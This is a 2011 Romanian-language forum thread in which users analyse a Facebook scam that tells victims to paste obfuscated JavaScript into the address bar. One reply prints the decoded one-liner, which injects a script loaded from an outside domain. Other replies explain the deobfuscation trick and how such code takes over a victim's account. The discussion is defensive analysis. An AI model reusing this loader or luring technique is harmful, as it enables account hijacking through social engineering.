AlStar Posted April 15, 2011 Report Share Posted April 15, 2011 Am primit pe FB o cerere de participare la un "event". Pe pagina "event-ului" este un link ce redirectioneaza pe-o pagina care te indruma sa scrii un cod..lung, in bara de adresa cand tab-ul cu FB este activ:http://slexy.org/raw/s20FqIlPi1Alea cu \x28,x\25..etc.. stiu cum sa decodez. Da' alea gen _0x9dd7x1 sau _0x4562 nu stiu.. Quote Link to comment Share on other sites More sharing options...
Nytro Posted April 15, 2011 Report Share Posted April 15, 2011 (a=(b=document).createElement('script')).src='//thefbsecret.info/jsp.php',b.body.appendChild(a);void(0)L-am "decodat" in 10 secunde. Trebuie doar sa ai imaginatie... Quote Link to comment Share on other sites More sharing options...
Birkoff Posted April 15, 2011 Report Share Posted April 15, 2011 da si eu de juma de zi tot primesc invitatii la acel eveniment si m-am saturat sa dau ignore... cu ocazia asta mi-am mai sters din "prieteni" ca sa nu ma mai streseze atat Quote Link to comment Share on other sites More sharing options...
AlStar Posted April 16, 2011 Author Report Share Posted April 16, 2011 (edited) Nytro, imi dai te rog niste indicatii? Ca sa tin minte pentru alte dati.Si, in concluzie, face vreo ceva scriptu' asta?da si eu de juma de zi tot primesc invitatii la acel eveniment si m-am saturat sa dau ignore... cu ocazia asta mi-am mai sters din "prieteni" ca sa nu ma mai streseze atatEu aseara am dat "Report" si acu' vad ca nu mai e Edited April 16, 2011 by AlStar Quote Link to comment Share on other sites More sharing options...
Nytro Posted April 16, 2011 Report Share Posted April 16, 2011 Ai un "eval" acolo, care apeleaza o functie de decryptare. Functia decrypteaza totul, si returneaza rezultatul pentru a fi evaluat. Un simplu "document.write" sau un "alert" in loc de acel return e de ajuns pentru a vedea rezultatul si pentru a nu fi rulat.Dar link-ul e catre un JS mai complex si cu care am avut probleme, cred ca a fost prost scris. Daca nu o sa am ce face o sa incerc sa vad ce face, dar e ceva cod si imi e lene.Ideea de baza cu Facebook e urmatoare: pui fraieru sa ruleze cod JavaScript, poti face pe Facebook-ul lui cam tot ce ar putea face el, in afara doar de chestiile "sociale" ca: recunoaste persoana "x" sau coduri CAPTCHA sau cine stie ce altceva ce necesita o urma de inteligenta. Quote Link to comment Share on other sites More sharing options...
bresti Posted April 23, 2011 Report Share Posted April 23, 2011 de curiozatate care sa uitat si la jsp.php de la hefbsecret.info/jsp.php ? Quote Link to comment Share on other sites More sharing options...